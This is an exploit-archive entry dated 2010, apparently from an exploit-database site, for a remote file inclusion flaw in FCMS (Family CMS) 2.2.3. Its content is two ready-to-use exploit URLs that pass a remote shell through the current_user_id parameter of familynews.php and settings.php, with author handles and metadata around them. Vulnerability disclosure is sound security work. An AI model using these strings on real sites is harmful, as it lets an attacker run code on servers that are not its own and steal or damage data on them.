FCMS 2.2.3 Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : FCMS 2.2.3 Remote File Inclusion Vulnerability
# Published : 2010-09-10
# Author : LoSt.HaCkEr
# Previous Title : MOAUB #10 - aradBlog Multiple Remote Vulnerabilities
# Next Title : E-Xoopport - Samsara <= v3.1 (Sections Module) Remote Blind SQL Injection Exploit

[x] Exploit Title: [FCMS_2.2.3 Remote File Inclusion ] 
[x] Date: 10-9-2010] 
[x] Author: LoSt.HaCkEr? ~? aDaM_TRoJaN
[x] Software Link: [http://www.familycms.com/getstarted.php] 
[x] Version: [v 2.2.3 ] 
[x]Tested on: [Windows XP] 
[x] CVE :
[x] My E-MaIl:LoSt.HaCkEr[at]HaCkEr[dot]Ps
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[x]Exploit: http://target/FCMS_2.2.3/FCMS_2.2.3/familynews.php?current_user_id=[shell]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[x]Exploit: http://target/FCMS_2.2.3/FCMS_2.2.3/settings.php?current_user_id=[SHeLL]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
[x]Greetings:? No Greet